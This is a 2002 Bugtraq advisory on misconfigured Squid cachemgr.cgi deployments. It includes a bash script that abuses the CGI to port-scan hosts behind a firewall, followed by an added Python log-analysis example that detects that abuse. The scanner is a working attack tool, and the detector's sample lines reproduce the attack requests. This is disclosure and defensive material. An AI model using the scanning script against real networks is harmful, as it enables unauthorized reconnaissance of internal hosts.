

cachemgr.cgi (squid 2.3STABLE4)


Date: Mon, 4 Feb 2002 17:43:36 +0100
From: Francisco Sáa Muñoz <fsaa@ip6seguridad.com.>
To: bugtraq@securityfocus.com
Subject: cachemgr.cgi (squid 2.3STABLE4)

]-* [IP6] Concept: Squid cachemgr.cgi misconfiguration

]-* [IP6] Configuration error [BID error class]

]-* [IP6] Platform investigated: 	Linux Redhat 6.2
        Squid 2.3STABLE4
        Apache 1.3.12

]-* [IP6] The problem...

Due to a misconfiguration of Apache and Squid, it is possible to use the
cachemgr.cgi shipped with Squid to scan hosts behind the corporate firewall.

...also we can gather a lot of information about the navigation,
configuration...

...also there is a lot of code with bad programmer habits!

There is a lil' script to demonstrate the error, not so clean, but useful.

--- Begin nasty code miscachemgr.cgi ---
#!/bin/bash -x

# Port scanning using a misconfigured squid
# using open apache

# Usage miscachemgr host_vuln host_to_scan end_port

# Concept: Jacobo Van Leeuwen & Francisco Sáa Muñoz
# Coded by Francisco Sáa Muñoz
# IP6 [Logic Control]

PORT=1
ONE='/cgi-bin/cachemgr.cgi?host='
TWO='&port='
THREE='&user_name=&operation&auth='

mkdir from_$1_to_$2

while [ $PORT -lt $3 ]; do

# lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\
# $2&port=$PORT&user_name=&operation=authenticate&auth= > \
# port_$1_to_$2/$PORT.log 2>&1

lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1
let PORT=PORT+1

done
--- End nasty Code ---

]-* [IP6] Solution

Deny access, configure it!

]-* [IP6] Thanks

Thanks to all IP6 staff for the good feeling.

Signed,

--
Francisco Sáa Muñoz :: Nuno Treez (HLP)
Security Consultant/Tiger Team
IP6 Seguridad http://www.ip6seguridad.com
--
Linux User #119288
Proud mame.dk user #115087
--
"What if I'm not elite? Ragna Gronvold says I'm special" (yes, it's from
rfp)
--

]-* [IP6] EOF
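
Added example (not part of the original post, and not Squid or Apache project code): a log check for the abuse described above. It reads Apache access-log lines and flags clients that point cachemgr.cgi at a host other than the cache itself, or at many different ports. The log lines, addresses, function names, the cache_hosts list and the max_ports threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache common/combined log format: client ... [time] "METHOD url PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+)[^"]*" \d{3}')

def cachemgr_targets(lines):
    """Map (client, target host) -> set of ports requested through cachemgr.cgi."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        client, url = m.groups()
        parts = urlsplit(url)
        if not parts.path.endswith("/cachemgr.cgi"):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)
        host = query.get("host", [""])[0].lower()
        if host:
            seen[(client, host)].add(query.get("port", [""])[0])
    return seen

def suspicious(lines, cache_hosts=("localhost", "127.0.0.1"), max_ports=2):
    """Return (client, target, port count, reasons) for requests worth reviewing."""
    alerts = []
    for (client, host), ports in sorted(cachemgr_targets(lines).items()):
        reasons = []
        if host not in cache_hosts:  # assumption: the cache runs on the web host
            reasons.append("target is not a known cache")
        if len(ports) > max_ports:
            reasons.append(f"{len(ports)} distinct ports")
        if reasons:
            alerts.append((client, host, len(ports), reasons))
    return alerts

# Constructed sample log lines using documentation/private addresses.
_TS = "[04/Feb/2002:17:40:01 +0100]"
_CGI = "/cgi-bin/cachemgr.cgi"
SAMPLE = [
    f'192.0.2.10 - - {_TS} "GET {_CGI}?host=localhost&port=3128'
    f'&user_name=&operation=authenticate&auth= HTTP/1.0" 200 1523',
    f'192.0.2.10 - - {_TS} "GET /index.html HTTP/1.0" 200 100',
] + [
    f'198.51.100.7 - - {_TS} "GET {_CGI}?host=10.0.0.5&port={p}'
    f'&user_name=&operation&auth= HTTP/1.0" 200 900' for p in range(1, 6)
]

if __name__ == "__main__":
    for alert in suspicious(SAMPLE):
        print(alert)
```

Only requests that carry the parameters in the URL show up this way; parameters sent in a POST body are not recorded in the access log.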

